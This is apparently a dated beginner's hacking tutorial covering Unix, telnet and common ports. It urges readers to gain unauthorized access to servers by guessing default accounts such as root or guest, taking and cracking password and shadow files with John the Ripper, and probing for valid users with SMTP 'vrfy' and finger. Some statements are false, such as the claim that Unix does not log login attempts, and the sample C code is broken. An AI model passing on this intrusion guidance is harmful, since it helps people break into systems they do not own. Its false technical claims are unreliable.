This is a brief tutorial designed to show you how to get started with
hacking. It is not an in depth analysis of Unix and I will not show you how
to hack specific systems or give you any specific usernames or passwords.
Anything that you do after reading this file is NOT my responsibility, so
don't expect me to write to you in jail if you get caught. If you are an
advanced hacker, then I suggest you give this a miss as it's designed for
beginners...
Section 1 : What exactly is a hacker then?
Tricky one really. There are hundreds of definitions floating around, but
the basic description of a hacker would be someone who accesses and uses a
computer system in ways which a normal user might not think of. This may be
legal, but chances are that it will be illegal. Also, many hackers might not
consider you to be one of them unless you have the hacker attitude.
Basically what this means is that you have a certain view over the way in
which things should be done. For example, nearly all hackers are anti
authoritarian. Another thing which you really should do is give voluntry
help to other hackers. This may be in the form of debugging programs that
they have written, informing them of new bugs in systems e.t.c.... There are
plenty of detailed FAQ's out there, so I won't go into it in detail. Try
looking up 'hacker ethics' in any descent search engine (www.altavista.com
is pretty good) for more
Section 2 : Tell me how to hack!
Yeah right. You ask any hacker or newsgroup this and your gonna get flamed.
Flaming is when someone responds to your question by throwing a string of
anger and obsenities at you because they are mad. Why would they do this?
After all hacking is about giving voluntry help isn't it? Well, asking how
to hack is not only far too general, but it's also pointless. Nobody can
tell you how to hack. They can give you passwords, programs and bugs, but
they by doing this they would be stopping you from learning and discovering
new things, and let's face it, the best way to learn to hack is to do it.
Section 3 : Where to learn
Apart from actually hacking, the most important thing you can do is read.
Texts can come from a variety of sources, including your local library and
of coarse the internet. There are some around with titles like 'The secret
underworld of hacking' but these are mostly a waste of time, and contain no
valuable information. Instead, read books with titles like : 'Unix : An
introduction' or 'How to teach yourself Unix'. These will contain a wealth
of commands and information. You will not learn by simply downloading
programs to do your work for you, although some are essential (I'll tell you
which ones later).
Section 4 : The art of hacking
Hacking is in many ways an art. It takes time, patience and intelligence.
You won't get immediate gratification, but if you do get good, then it's
really worth it. There are several skills accosiated with hacking, but the
fundemental one, which is often overlooked by newbies is the ability to
program. Programming is basically telling the computer what to do, and a
programming language is the way in which you write it. Again, there are
millions of tutorials to do with this subject, and it is FAR too big to go
into here. The basic languages you will need to know are perl and c, which
are the main languages for the Unix operating system (I'll go onto that in a
second). Again, any good search engine will give you hundreds of sites
realted to these. Just to give you an idea of what programming is about,
here' some c source code (that's the text before it is compiled/interpreted
so the computer can understand it):
#include
using namespace std;
int main()
{
cout<<'Hi there, how are you!';
}
Note that this section of code is taken from a MSDOS application. Unix will
differ slightly. Although it can be a bit tedious, programming is very
rewarding, and is very important if you want to become a good hacker. You
won't need to become some programming genius to hack though, just have a
general idea of the syntax used by the languages. The next important skill
you need to learn is how to use the Unix operating system. This is an
operating system (like windows or DOS) which is specifically designed for
networking. Most big servers use it and it allows thousands of users to
connect to virtual (software) and hardware ports remotely ( if the computer
it is operating has them). Like programming, Unix is very complicated and
detailed, so I can only give you an introduction here. The best way to teach
you what Unix is is to give you an example. This example assumes that the
person using it has a shell account (a user name and password so that he can
log in and use the computers), and that the user has windows on their
computer. It is entirely fictional:
(In the run bar)
telnet shinracorperation.com 23
(Telnet starts up, there's a brief pause before the cursor starts flashing)
SunOS : 5.10
login:rudolf
password:########
Welcome to the shinra corperations main server. Type 'help' for more.
$
That is an example of a typical Unix system. To operate it, we run telnet
(the standard telnet program included with windows), this will allow our
computer to communicate with the remote server which is
shinracorperation.com. The number 23 after it tells telnet to connect to
port 23 on the computer. Ports allow remote users to input commands to the
computer. A computer can have thousands of ports, each with a different
number, but the most common and what they do are:
13 : Date and time port (pretty useless really)
21 : FTP (File transport Protocal) port
23 : Standard telnet port. This is the port which the telnet program will
try to open by default
25 : Send Mail port. This allows the user to operate an ancient send mail
program which can send messages to email addresses on that server (more
later)
79 : The 'finger' port. This allows the user to type in the name of a user
and get details on them (very useful)
80 : Standard http port (it's the one your browser opens)
110 : POP port. Allows you to operate a primitive POP email program.
To connect to each of these ports you would put the number instead of 23 in
the command line. The next line tells us what type of operating system the
computer is using. This will become important if you need to use a bug or
back door to get into the system, as they vary from operating system to
operating system. One advantage of Unix operating systems is that they don't
record your login attemps, so the sysadmin won't find 6000 attempts in his
log file when he has a look. Now, the only thing holding us back here is the
need for a username and password. In the early days of hacking, you could
telnet to any computer, type in root as your username and root as your
password and you'd be in with superuser privialges (root is the username
that should give you the ability to do anything on that computer). That
ain't gonna happen these days. There are some servers which you might be
lucky enough to guess a username and password on, so have a look at the list
below of common Unix users:
root
admin
adm
sysadmin
guest (VERY often the password will be guest too)
test
demo
uucp
Although unlikely, these may work if you enter the password the same as the
username, it's worth a try. I hope that gave you an idea of what Unix is.
The final part, by the way, was the command prompt, similair to the C:\>
prompt in DOS. Here you would enter commands for the computer. Since this is
only an introduction, I won't go into commands here, but there are plenty of
books, many from your local library which will tell you how to use Unix. You
can find more information on how to exploit bugs in Unix operating systems
and backdoors in them by using a search engine. Chances are that you will
not be able to guess the password. In this case you'll need to do some
research. Try looking at the companies web site, and finding out things
about them.
Section 5 : Toolz
Although you should use them as little as possible, you will need to use
some programs. One of the most essential is a password cracking program. In
most Unix systems, the password file is located in /etc/passwd. As I've
said, there are plenty of files which will tell you how to download it, so I
won't go into that here. Now, assuming you've got the password file, you'll
need a program called John the Ripper deencrypt the file and get the
passwords. If you open the passwd file with a standard editor like notepad
or edit, you will see something like:
root:h589798Hhgh:0:0:/etc
or
root:x:0:0:/etc
With many more lines added on. If it looks like the first one, then not only
are you lucky, but you've got the passwords for the entire system. Now run
Jack the ripper on it, and if your dictionary file (a file with lots of
standard passwords in it) is good enough, you should at least get a few of
the passwords. If you get root, then get very, very excited. You can now log
into the system and do anything. BUT be warned, you do ANY damage what so
ever, and they'll find you within a couple of hours, so DON'T. Not only
that, but it'll make you a cracker which is someone who breaks into a system
to do damage to it, they are looked down upon by real hackers. Now, if it
looks more like the second one, get ready to cry 'cos the password file is
shadowed. This means that although the users are stored in the passwd file,
the passwords are stored in different one, usually /etc/shadow. This
obviously means that you must download the shadow file (the server probably
won't let you), merge it with the passswd file, and then run john the ripper
on it. If you can get both the passwd and shadow files, you'll need to get a
program called VCU to merge them, although there are some others around.
Shadowing is used by most servers these days, and makes life a hell of a lot
more difficult
Section 6 : Using programs on the server
The first program I'm gonna look at is SMTP (send mail) which is usually
stored on port 25. I'm not gonna give any direct examples here, but replace
the xxx part with virtually any server name and you should find one:
telnet xxx 25
SMPT Version 1.3 Ready
And that is all you get. You are now ready to run this program. It allows
you to send mail to anyone who has an email address within that server. The
commands that you'll need to know to use this program are
help - gives you a list of commands. If you follow it with a command, it
will give you help on it
helo - This tells the computer who you are
mail from:xxx - It will say who the mail is from on the message (replace xx
with a made up or real email address)
rcpt to: - Who the mail will go to. It must be within the server that you
are hacking or you will get the error 'Relaying not allowed'
data : Press enter, and type in what you want the message to say. Put a full
stop (a period) and a seperate line and press enter to end and send the
message
quit : Disconnects you
vrfy xxx : Replace the xxx with a user name, and it will tell you if it
exists
This should give you a basic idea of how to use the program. The commands
should come in that order to send mail (vrfy is not needed to send mail, you
can simply use it to tell if a user exists. Oh yeah, and you won't see what
you type in.
The other program I'm gonna look at is in port 79 so type:
telnet xxx 79
You will be greeted by, well nothing. Loads of servers have closed this
port, but if they have it open, then it is very useful. All you do is type
in the name of the user you want to finger, and it will give you their
account details. Try all of the common users above. This program will
usually only let you finger one user before disconnecting.
Conclusion
I hope this has been an informative introduction into the world of hacking.
Even at this level, there are tonnes more things which you will need to find
out about so that you can hack. I suggest you look the following things up
in your search engine:
Unix operatins system
computer security
hacking
c programming
perl programming
hacking tutorials
Hopefully you will find what you need. One last word of warning, be VERY
careful about hacking, and don't do any damage, you WILL get caught if you
do. Oh yeah, and have fun...
Legal Stuff...
You may reproduce this document on any web page or on any CDROM or
otherwise. You do not have to ask my permission or anything, as long as it
remains unchanged and I get the credit. As I've already said, I'm not
responsible if you act on the information above, and this was intended for
EDUCATIONAL PURPOSES ONLY.
Source